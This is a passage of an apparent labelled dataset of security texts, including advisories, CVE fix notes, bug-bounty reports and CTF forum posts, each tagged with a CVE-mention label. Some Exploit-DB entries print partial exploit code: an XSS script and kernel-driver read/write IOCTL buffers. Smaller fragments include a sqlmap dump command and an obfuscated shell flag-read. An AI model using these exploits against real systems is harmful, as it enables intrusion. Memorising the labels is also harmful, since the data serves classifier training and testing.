Content-Type: text/html; charset=UTF-8\n<\n* Connection #0 to host b.com left intact\n* Clear auth, redirects to port from 80 to 8000\n* Issue another request to this URL: 'http://a.com:8000/'\n* Trying 127.0.0.1:8000...\n* Connected to a.com (127.0.0.1) port 8000 (#1)\n> GET / HTTP/1.1\n> Host: a.com:8000\n> User-Agent: curl/7.83.1\n> Accept: */*\n> x-auth-token: secrettoken\n```\n\nThe reason for the problem is that curl's filtering of authentication header header is incomplete. The Proxy-Authorization and x-auth-token headers are not considered, only restrict the delivery of Cookies and Authorization.\n\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n * [attachment / reference]\nhttps://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/Proxy-Authorization\n\n## Impact\n\nLeak of Proxy-Authorization and x-auth-token headers.", "source": "hackerone", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b9fa5501359496cddfab", "text": "I’m still stuck. I’m not able to make out all the hints that people gave in here. I would really appreciate if anyone could give me somemore hints or can provide me any resources so that I could understand this topic well", "source": "hackthebox", "timestamp": "2023-05-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3a5454d298339bf43e5f", "text": "Improper Privilege Management in sap-xssec\n\n[Severity: CRITICAL]\n\n### Impact\n\nSAP BTP Security Services Integration Library ([Python] sap-xssec) allows under certain conditions an escalation of privileges. On successful exploitation, an unauthenticated attacker can obtain arbitrary permissions within the application.\n\n### Patches\nUpgrade to patched version >= 4.1.0\nWe always recommend to upgrade to the latest released version.\n\n### Workarounds\nNo workarounds\n\n### References\nhttps://www.cve.org/CVERecord?id=CVE-2023-50423\n", "source": "github_advisory", "timestamp": "2023-12-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "a64a8375e865bc992065", "text": "Finally I did it. @mezzown was right. Whoever stuck with this task, read @mezzown comment attentively and revise ‘shellcode requirements’ once again.", "source": "hackthebox", "timestamp": "2023-06-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "96e25a327f99cad24c64", "text": "Online Security Guards Hiring System 1.0 - Reflected XSS\n\n#Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS\n#Google Dork : NA\n#Date: 23-01-2023\n#Exploit Author : AFFAN AHMED\n#Vendor Homepage: https://phpgurukul.com\n#Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip\n#Version: 1.0\n#Tested on: Windows 11 + XAMPP + PYTHON-3.X\n#CVE : CVE-2023-0527\n\n#NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT\n# Below code check for both the parameter /admin-profile.php and in /search.php\n\n#POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md\n\n\nimport requests\nimport re\nfrom colorama import Fore\n\nprint(Fore.YELLOW + \"######################################################################\" + Fore.RESET)\nprint(Fore.RED + \"# TITLE: Online Security Guards Hiring System v1.0\" + Fore.RESET)\nprint(Fore.RED + \"# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)\" + Fore.RESET)\nprint(Fore.RED + \"# VENDOR OF THE PRODUCT : PHPGURUKUL\" + Fore.RESET)\nprint(Fore.RED + \"# AUTHOR : AFFAN AHMED\" + Fore.RESET)\nprint(Fore.YELLOW +\"######################################################################\" + Fore.RESET)\n\nprint()\nprint(Fore.RED+\"NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py\"+ Fore.RESET)\nprint()\n\n\n# NAVIGATING TO ADMIN LOGIN PAGE\nWebsite_url = \"http://localhost/osghs/admin/login.php\" # CHANGE THE URL ACCORDING TO YOUR SETUP\nprint(Fore.RED+\"----------------------------------------------------------------------\"+ Fore.RESET)\nprint(Fore.CYAN + \"[**] Inserting the Username and Password in the Admin Login Form [**]\" + Fore.RESET)\nprint(Fore.RED+\"----------------------------------------------------------------------\"+Fore.RESET)\n\nAdmin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''}\n\nheaders = {\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'Referer': 'http://localhost/osghs/admin/login.php',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.9',\n 'Connection': 'close',\n 'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc',\n 'Sec-Fetch-Site': 'same-origin',\n 'Sec-Fetch-Mode': 'navigate',\n 'Sec-Fetch-User': '?1',\n 'Sec-Fetch-Dest': 'document'\n}\n\nresponse = requests.request(\"POST\", Website_url, headers=headers, data = Admin_login_credentials)\nif response.status_code == 200:\n location = re.findall(r'document.location =\\'(.*?)\\'',response.text)\n if location:\n print(Fore.GREEN + \"> Login Successful into Admin Account\"+Fore.RESET)\n print(Fore.GREEN + \"> Popup:\"+ Fore.RESET,location )\n else:\n print(Fore.GREEN + \"> document.location not found\"+ Fore.RESET)\nelse:\n print(Fore.GREEN + \"> Error:\", response.status_code + Fore.RESET)\nprint(Fore.RED+\"----------------------------------------------------------------------\"+ Fore.RESET)\nprint(Fore.CYAN + \" [**] Trying XSS-PAYLOAD in Admin-Name Parameter [**]\" + Fore.RESET)\n\n\n# NAVIGATING TO ADMIN PROFILE SECTION TO UPDATE ADMIN PROFILE\n# INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETER\nWebsite_url= \"http://localhost/osghs/admin/admin-profile.php\" # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE\n\n# FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD\n# FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=&search=\"\"\npayload = {\n \"adminname\": \"TESTAdmin\", # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE\n \"username\": \"admin\", # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE\n \"mobilenumber\": \"8979555558\",\n \"email\": \"admin@gmail.com\",\n \"submit\": \"", "source": "exploitdb", "timestamp": "2023-05-31", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "8771a15364a6d3c2e53d", "text": "Hi I’m stuck at Control flow - loops. My for loop: for i in {1…28} do var=$(echo $var | base64 -w 0) if [[ $i -eq 28 ]] then salt=$(echo -n $var | wc -c) #also used without -n and echo ${ #var }, with same result fi done Result: *** WARNING : deprecated key derivation used. Using -iter or -pbkdf2 would be better. bad decrypt 140511816897856:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:…/crypto/evp/evp_enc.c:610: I used pwnbox. Can anyone help me please?", "source": "hackthebox", "timestamp": "2022-10-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "5262411548c0b79b8e34", "text": "How to bruteforce dahua dvr password\n\nHow to crack Dahua DVR password, we have already used Hydra tool, Metasploit, Routersploit, and Burpsuite Pro, but nothing worked It’s pentesting scenario and we are in the same DVR network, without any IDS or IPS or firewall just simple network Any recommendations?", "source": "hackersploit", "timestamp": "2022-10-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d2f9932849d7c1b7bf7e", "text": "Coelho: ${LS_COLORS:10:1}c’a’t’${PATH:0:1}fl’a’g.txt Tried everything nothing seems to be working, can you give me some more hints", "source": "hackthebox", "timestamp": "2023-12-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "875817be766345a54c5f", "text": "Cross-site Scripting in Jenkins CRX Content Package Deployer Plugin\n\n[Severity: HIGH]\n\nJenkins CRX Content Package Deployer Plugin 1.9 and earlier does not escape the name and description of CRX Content Package Choice parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.\n\nExploitation of this vulnerability requires that parameters are listed on another page, like the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages provided by Jenkins (core), and that those pages are not hardened to prevent exploitation. Jenkins (core) has prevented exploitation of vulnerabilities of this kind on the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages since 2.44 and LTS 2.32.2 as part of the [SECURITY-353 / CVE-2017-2601](https://www.jenkins.io/security/advisory/2017-02-01/#persisted-cross-site-scripting-vulnerability-in-parameter-names-and-descriptions) fix. Additionally, several plugins have previously been updated to list parameters in a way that prevents exploitation by default, see [SECURITY-2617 in the 2022-04-12 security advisory for a list](https://www.jenkins.io/security/advisory/2022-04-12/#SECURITY-2617).", "source": "github_advisory", "timestamp": "2022-06-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "a6df989a6374dc012141", "text": "Can someone help with Bypassing Authentication please? I tried hydra (but I can’t get around redirect) and a lot of SQL injection techniques, nothing is working UPDATE: I actually managed to do this with a popular mapping tool…", "source": "hackthebox", "timestamp": "2022-06-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8105d76038705f30497d", "text": "Hi @Lt72884 I proudly keep BackTrack 5 (Gnome and KDE) on my drive of ISOs. If you are using Metasploitable2 (Ubuntu 8.04), you may want to try Metasploitable3 (Ubuntu 14.04 or Windows Server 2008). Build using Vagrant or download Ova .", "source": "parrotsec", "timestamp": "2023-06-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "47d6f275fa1dbc1236a4", "text": "System Mechanic v15.5.0.61 - Arbitrary Read/Write\n\n/*\n# Exploit Title: System Mechanic v15.5.0.61 - Arbitrary Read/Write\n# Date: 26-09-2022\n# Exploit Author: Brandon Marshall\n# Vendor Homepage: https://www.iolo.com/\n# Tested Version - System Mechanic version 15.5.0.61\n# Driver Version - 5.4.11 - amp.sys\n# Tested on OS - 64 bit Windows 10 (18362)\n# Fixed Version - System Mechanic 17.5.0.116\n# CVE : CVE-2018-5701\n*/\n\n#include \n#include \n#include \n#include \n#pragma warning(disable:4996)\n\ntypedef struct _kernelDriverInformation {\n char* imageName;\n void* imageBase;\n\n}kernelDriverInformation, * PKernelDriverInformation;\n\ntypedef struct _functionInformation {\n char* functionName;\n void* functionOffset;\n void* functionBase;\n\n}functionInformation, * PFunctionInformation;\n\nvoid callDeviceIoControl(HANDLE deviceHandle, void* inputBuffer, DWORD inputBufferSize) {\n DWORD bytesReturned;\n NTSTATUS status = DeviceIoControl(deviceHandle, 0x226003, inputBuffer, inputBufferSize, NULL, NULL, (LPDWORD)&bytesReturned, (LPOVERLAPPED)NULL);\n}\n\nHANDLE getDeviceHandle(char* name) {\n DWORD generic_read = 0x80000000;\n DWORD generic_write = 0x40000000;\n HANDLE handle = CreateFileA((LPCSTR)name, GENERIC_READ | generic_write, NULL, NULL, 0x3, NULL, NULL);\n return handle;\n}\n\n\n\nvoid* CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(void* addressToDereference, SIZE_T bufferSize) {\n byte* maliciousBuffer = (byte*)malloc(bufferSize);\n *(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // funciton pointer, this will be 5\n *(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters\n *(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value\n *(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown\n *(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16\n *(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)0; // param2\n *(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)addressToDereference; // param3\n *(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)0; // param4\n return (void*)maliciousBuffer;\n}\n\nvoid* CreateReadDWORDFromKernelMemoryLeakIOCTLBuffer(SIZE_T bufferSize) {\n byte* maliciousBuffer = (byte*)malloc(bufferSize);\n *(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // funciton pointer, this will be 5\n *(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters\n *(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value\n *(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown\n *(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLONG)16; // this will be 16\n *(ULONGLONG*)(maliciousBuffer + 0x28) = (ULONGLONG)2; // param2\n *(ULONGLONG*)(maliciousBuffer + 0x30) = (ULONGLONG)(maliciousBuffer + 0x40); // param3\n *(ULONGLONG*)(maliciousBuffer + 0x38) = (ULONGLONG)(maliciousBuffer + 0x48); // param4\n *(ULONGLONG*)(maliciousBuffer + 0x40) = (ULONGLONG)0; //unknown\n *(ULONGLONG*)(maliciousBuffer + 0x48) = 0xffffffff; // param1\n return (void*)maliciousBuffer;\n}\n\nvoid* CreateWriteDWORDFromKernelMemoryIOCTLBuffer(void* addressToWriteTo, SIZE_T bufferSize) {\n byte* maliciousBuffer = (byte*)malloc(bufferSize);\n *(ULONGLONG*)maliciousBuffer = (ULONGLONG)5; // funciton pointer, this will be 5\n *(ULONGLONG*)(maliciousBuffer + 0x8) = (ULONGLONG)(maliciousBuffer + 0x20); //(maliciousBuffer); pointer to parameters\n *(ULONGLONG*)(maliciousBuffer + 0x10) = (ULONGLONG)(maliciousBuffer + 0x10); //(maliciousBuffer + 0x20);// (0x1); pointer to write return value\n *(ULONGLONG*)(maliciousBuffer + 0x18) = (ULONGLONG)0;//(ULONGLONG)(maliciousBuffer + 0x40); // unknown\n *(ULONGLONG*)(maliciousBuffer + 0x20) = (ULONGLON", "source": "exploitdb", "timestamp": "2023-03-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "6b79789e60aa487c85e4", "text": "OpenStack Keystone Allows Remote User Account Creation\n\n[Severity: HIGH]\n\nOpenStack Keystone, as used in OpenStack Folsom before folsom-rc1 and OpenStack Essex (2012.1), allows remote attackers to add an arbitrary user to an arbitrary tenant via a request to update the user's default tenant to the administrative API. NOTE: this identifier was originally incorrectly assigned to an open redirect issue, but the correct identifier for that issue is CVE-2012-3540.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f916286e252e1f7a2609", "text": "Debug, and debug again, what is the value of the rdx register before the xor? Sorry but I’m a bit confused. xor [rdx], rbx should not alter the value in rbx but directly write the xor-ed value back to the stack. Also, I tried directly yielding the control flow to the decoded shellcode by enabling stack execution when linking the binary with ld -z execstack . Unfortunately, the decoded shellcode contains plenty of register-based memory access, which leads to segfaults as most of the registers are initialized with value 0.", "source": "hackthebox", "timestamp": "2023-10-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e34bd6d36e7c5e957852", "text": "CVE: CVE-2022-2216\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository ionicabizau/parse-url prior to 7.0.0.'}]\n\nFix commit: Refactor codebase, upgrade dependencies", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "be748b5bc462c6426537", "text": "CVE: CVE-2022-24754\n\n[{'lang': 'en', 'value': 'PJSIP is a free and open source multimedia communication library written in C language. In versions prior to and including 2.12 PJSIP there is a stack-buffer overflow vulnerability which only impacts PJSIP users who accept hashed digest credentials (credentials with data_type `PJSIP_CRED_DATA_DIGEST`). This issue has been patched in the master branch of the PJSIP repository and will be included with the next release. Users unable to upgrade need to check that the hashed digest data length must be equal to `PJSIP_MD5STRLEN` before passing to PJSIP.'}]\n\nFix commit: Use PJ_ASSERT_RETURN() on pjsip_auth_create_digest() and pjsua_init_tpselector() (#3009)\n\n* Use PJ_ASSERT_RETURN on pjsip_auth_create_digest\r\n\r\n* Use PJ_ASSERT_RETURN on pjsua_init_tpselector()\r\n\r\n* Fix incorrect check.\r\n\r\n* Add return value to pjsip_auth_create_digest() and pjsip_auth_create_digestSHA256()\r\n\r\n* Modification based on comments.", "source": "cvefixes", "timestamp": "2022-03-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "962363e8ab01efd4ecc2", "text": "Hi @RyanPaulGannon I think installing into /opt is the preferred place of installing external packages. But (via apt) burpsuite by default on Parrot is installed in /usr/bin/. ┌─[anon@cracker]─[~] └──╼ $cd /usr/bin/ ┌─[anon@cracker]─[/usr/bin] └──╼ $burpsuite --version 2022.2.4-12081 Burp Suite Community Edition ┌─[anon@cracker]─[/usr/bin] └──╼ $ls -lah burpsuite -rwxr-xr-x 1 root root 504M Mar 22 12:39 burpsuite", "source": "parrotsec", "timestamp": "2022-05-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8c483e77fee1cbee3edf", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nThe Chakra JavaScript engine in Microsoft Edge allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \"Scripting Engine Memory Corruption Vulnerability,\" a different vulnerability than CVE-2016-3386, CVE-2016-7190, and CVE-2016-7194.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d968951aa29b790f405d", "text": "Five Important Check Points..\n\nI was researching this topic for a while. And came across several talking points. What are the five most important points to remember while developing a website? I know each point is key to a great website, but what are the five priority checkpoints? Although reducing the long list to a finite number is a crazy thing, I am curious to keep a short checklist. What are they?", "source": "go4expert", "timestamp": "2022-07-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "ff47d94809b66bd03a9f", "text": "CVE: CVE-2022-2061\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository hpjansson/chafa prior to 1.12.0.'}]\n\nFix commit: libnsgif: fix oob in lzw_decode", "source": "cvefixes", "timestamp": "2022-06-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "488a987988c8fe1e9ec4", "text": "SS7 is impossible Withoud Hackrfone Hardware Device do you have this device??", "source": "hackersploit", "timestamp": "2022-08-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "02b7dfaeb18cef8c24b2", "text": "The “other user” on that system found is “g.potter”. Are we still talking about that one?", "source": "hackthebox", "timestamp": "2022-03-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e841a4f8aa8c89e1a5bf", "text": "This and other free resources for real install the OS fire up that firefox=ESR and there are all resources even more.", "source": "parrotsec", "timestamp": "2023-11-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "827cb843ffab392374bf", "text": "CVE: CVE-2022-2400\n\n[{'lang': 'en', 'value': 'External Control of File Name or Path in GitHub repository dompdf/dompdf prior to 2.0.0.'}]\n\nFix commit: Update resource URI validation and handling\n\nURI scheme (protocol) validation rules are now specified through the Options class. By default file and http(s) URIs are allowed and validation rules defined. Validation rules for PHAR URIs are defined but the scheme is not enabled by default.\n\nResource retrieval has been updated to use file_get_contents for schemes other than http(s).\n\nfixes #621\nfixes #2826\n\nin lieu of #1903", "source": "cvefixes", "timestamp": "2022-07-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2e4d43091b889db27930", "text": "In case someone is still looking for the answer… Since it’s asking us to test the cookie value, Command: sqlmap ‘url’ --cookie=‘id=1*’ --dump --batch", "source": "hackthebox", "timestamp": "2023-10-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "fdfb4b7aaa2cb7fb2596", "text": "I think this one is broken, all the files in the /home/alex folder are missing and I’m unable to connect to get the Elasticity flag, maybe some more files are missing too Can anybody vote for reset to restore it?", "source": "hackthebox", "timestamp": "2022-08-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "229436f6b57ae982cdce", "text": "I agree, it's better to wait, because there are bugs, it makes less worktime productivity.", "source": "go4expert", "timestamp": "2022-01-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1f092c1b684e1fcba212", "text": "here is the solution if none of the advice did not work. Make sure to delete “salt” in the #Variables tab. We will set the salt in the loop. Variables var=“9M” hash=“VTJGc2RHVmtYMTl2ZnYyNTdUeERVRnBtQWVGNmFWWVUySG1wTXNmRi9rQT0K” Base64 Encoding Example: $ echo “Some Text” | base64 ← For-Loop here for ((i = 0 ; i < 28 ; i++)); do echo “Try number $i” var=$(echo $var | base64) echo $var | wc -c salt=$(echo $var | wc -c) done", "source": "hackthebox", "timestamp": "2023-02-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "ce9dadd2c2ae6f2385ec", "text": "Gravitee API Management contains Path Traversal\n\n[Severity: HIGH]\n\n**This CVE addresses the partial fix for CVE-2019-25075**\n\nGravitee API Management before 3.15.13 allows path traversal through HTML injection. A certain HTML injection combined with path traversal in the Email service in Gravitee API Management before 3.15.13 allows anonymous users to read arbitrary files via a /management/users/register request.\n\nA patch was published in 2019 for this vulnerability but did not appear to have solved the issue. Version 3.15.13 did remove the flaw.", "source": "github_advisory", "timestamp": "2023-01-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "acfe6cfaec83b0765484", "text": "Kali Linux maltego | Kali Linux Tools sudo apt install maltego Maltego Support Installing Maltego Please download the appropriate Maltego installer from our website. Windows The correct operating system should be automatically detected on the web page. In the image below, Windows has been detected: From the dropdown menu, choose...", "source": "hackersploit", "timestamp": "2022-02-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2184bbe4b92141320008", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2022-08-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9026a6f80303b6eef6d2", "text": "CVE: CVE-2022-24829\n\n[{'lang': 'en', 'value': 'Garden is an automation platform for Kubernetes development and testing. In versions prior to 0.12.39 multiple endpoints did not require authentication. In some operating modes this allows for an attacker to gain access to the application erroneously. The configuration is leaked through the /api endpoint on the local server that is responsible for serving the Garden dashboard. At the moment, this server is accessible to 0.0.0.0 which makes it accessible to anyone on the same network (or anyone on the internet if they are on a public, static IP). This may lead to the ability to compromise credentials, secrets or environment variables. Users are advised to upgrade to version 0.12.39 as soon as possible. Users unable to upgrade should use a firewall blocking access to port 9777 from all untrusted network machines.'}]\n\nFix commit: fix(core): require auth key for server endpoints", "source": "cvefixes", "timestamp": "2022-04-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "6911e684a3b7f6a84da6", "text": "Learning is the way to get greater You may find instructions on how to use MSFvenom here: How to use msfvenom · rapid7/metasploit-framework Wiki · GitHub .", "source": "parrotsec", "timestamp": "2022-01-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "6873da200b9921062850", "text": "CVE: CVE-2022-35929\n\n[{'lang': 'en', 'value': 'cosign is a container signing and verification utility. In versions prior to 1.10.1 cosign can report a false positive if any attestation exists. `cosign verify-attestation` used with the `--type` flag will report a false positive verification when there is at least one attestation with a valid signature and there are NO attestations of the type being verified (--type defaults to \"custom\"). This can happen when signing with a standard keypair and with \"keyless\" signing with Fulcio. This vulnerability can be reproduced with the `distroless.dev/static@sha256:dd7614b5a12bc4d617b223c588b4e0c833402b8f4991fb5702ea83afad1986e2` image. This image has a `vuln` attestation but not an `spdx` attestation. However, if you run `cosign verify-attestation --type=spdx` on this image, it incorrectly succeeds. This issue has been addressed in version 1.10.1 of cosign. Users are advised to upgrade. There are no known workarounds for this issue.'}]\n\nFix commit: Merge pull request from GHSA-vjxv-45g9-9296\n\nToday the verification logic:\n1. Verifies signatures on attestations (at least one must verify, or it errors),\n2. All attestations matching the specified `--type` must pass any specified Cue/Rego policies,\n3. *All* signature-verified attestations are then printed.\n\nHowever, if NONE of the attestations match the specified `--type` then `2.` is considered satisfied and we proceed to `3.`\n\nThis changes the above logic to:\n1. Same.\n2. Same, but these are put into a `checked` list,\n3. `checked` must be non-empty (or an error is printed about no attestations matching `--type`),\n4. *Just* the `checked` attestations are printed.\n\n---\n\nThe bug at HEAD:\n```shell\n$ cosign verify-attestation --type spdx ghcr.io/distroless/static@sha256:dd7614b5a12bc4d617b223c588b4e0c833402b8f4991fb5702ea83afad1986e2\n\nVerification for ghcr.io/distroless/static@sha256:dd7614b5a12bc4d617b223c588b4e0c833402b8f4991fb5702ea83afad1986e2 --\nThe following checks were performed on each of these signatures:\n - The cosign claims were validated\n - Existence of the claims in the transparency log was verified offline\n - Any certificates were verified against the Fulcio roots.\nCertificate subject: https://github.com/distroless/static/.github/workflows/release.yaml@refs/heads/main\nCertificate issuer URL: https://token.actions.githubusercontent.com\nCertificate extension GitHub Workflow Trigger: schedule\nCertificate extension GitHub Workflow SHA: 7e7572e578de7c51a2f1a1791f025cf315503aa2\nCertificate extension GitHub Workflow Name: Create Release\nCertificate extension GitHub Workflow Trigger distroless/static\nCertificate extension GitHub Workflow Ref: refs/heads/main\n{\"payloadType\":\"application/vnd.in-toto+json\",\"payload\":\"eyJfdHlwZSI6Imh0dHBzOi8vaW4tdG90by5pby9TdGF0ZW1lbnQvdjAuMSIsInByZWRpY2F0ZVR5cGUiOiJjb3NpZ24uc2lnc3RvcmUuZGV2L2F0dGVzdGF0aW9uL3Z1bG4vdjEiLCJzdWJqZWN0IjpbeyJuYW1lIjoiZ2hjci5pby9kaXN0cm9sZXNzL3N0YXRpYyIsImRpZ2VzdCI6eyJzaGEyNTYiOiJkZDc2MTRiNWExMmJjNGQ2MTdiMjIzYzU4OGI0ZTBjODMzNDAyYjhmNDk5MWZiNTcwMmVhODNhZmFkMTk4NmUyIn19XSwicHJlZGljYXRlIjp7Imludm9jYXRpb24iOnsicGFyYW1ldGVycyI6bnVsbCwidXJpIjoiaHR0cHM6Ly9naXRodWIuY29tL2Rpc3Ryb2xlc3Mvc3RhdGljL2FjdGlvbnMvcnVucy8yNzc5MjEyNzA1IiwiZXZlbnRfaWQiOiIyNzc5MjEyNzA1IiwiYnVpbGRlci5pZCI6IkNyZWF0ZSBSZWxlYXNlIn0sInNjYW5uZXIiOnsidXJpIjoiaHR0cHM6Ly9naXRodWIuY29tL2FxdWFzZWN1cml0eS90cml2eSIsInZlcnNpb24iOiIwLjI5LjIiLCJkYiI6eyJ1cmkiOiIiLCJ2ZXJzaW9uIjoiIn0sInJlc3VsdCI6eyIkc2NoZW1hIjoiaHR0cHM6Ly9qc29uLnNjaGVtYXN0b3JlLm9yZy9zYXJpZi0yLjEuMC1ydG0uNS5qc29uIiwicnVucyI6W3siY29sdW1uS2luZCI6InV0ZjE2Q29kZVVuaXRzIiwib3JpZ2luYWxVcmlCYXNlSWRzIjp7IlJPT1RQQVRIIjp7InVyaSI6ImZpbGU6Ly8vIn19LCJyZXN1bHRzIjpbXSwidG9vbCI6eyJkcml2ZXIiOnsiZnVsbE5hbWUiOiJUcml2eSBWdWxuZXJhYmlsaXR5IFNjYW5uZXIiLCJpbmZvcm1hdGlvblVyaSI6Imh0dHBzOi8vZ2l0aHViLmNvbS9hcXVhc2VjdXJpdHkvdHJpdnkiLCJuYW1lIjoiVHJpdnkiLCJydWxlcyI6W10sInZlcnNpb24iOiIwLjI5LjIifX19XSwidmVyc2lvbiI6IjIuMS4wIn19LCJtZXRhZGF0YSI6eyJzY2FuU3RhcnRlZE9uIjoiMjAyMi0wOC0wMlQwMjozMzo0N1oiLCJzY2FuRmluaXNoZWRPbiI6IjIwMjItMDgtMDJUMDI6MzM6NTNaIn19fQ==\",\"signatures\":[{\"keyid\":\"\",\"sig\":\"MEYCIQCovB", "source": "cvefixes", "timestamp": "2022-08-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9b5549d33c3cb3b126b1", "text": "ReDoS based DoS vulnerability in Action Dispatch\n\n[Severity: LOW]\n\nThere is a possible regular expression based DoS vulnerability in Action Dispatch. This vulnerability has been assigned the CVE identifier CVE-2023-22792.\n\nVersions Affected: >= 3.0.0 Not affected: < 3.0.0 Fixed Versions: 5.2.8.15 (Rails LTS), 6.1.7.1, 7.0.4.1\nImpact\n\nSpecially crafted cookies, in combination with a specially crafted X_FORWARDED_HOST header can cause the regular expression engine to enter a state of catastrophic backtracking. This can cause the process to use large amounts of CPU and memory, leading to a possible DoS vulnerability All users running an affected release should either upgrade or use one of the workarounds immediately.\nReleases\n\nThe FIXED releases are available at the normal locations.\nWorkarounds\n\nWe recommend that all users upgrade to one of the FIXED versions. In the meantime, users can mitigate this vulnerability by using a load balancer or other device to filter out malicious X_FORWARDED_HOST headers before they reach the application.\nPatches\n\nTo aid users who aren’t able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset.\n\n 6-1-Use-string-split-instead-of-regex-for-domain-parts.patch - Patch for 6.1 series\n 7-0-Use-string-split-instead-of-regex-for-domain-parts.patch - Patch for 7.0 series\n\nPlease note that only the 7.0.Z and 6.1.Z series are supported at present, and 6.0.Z for severe vulnerabilities. Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported 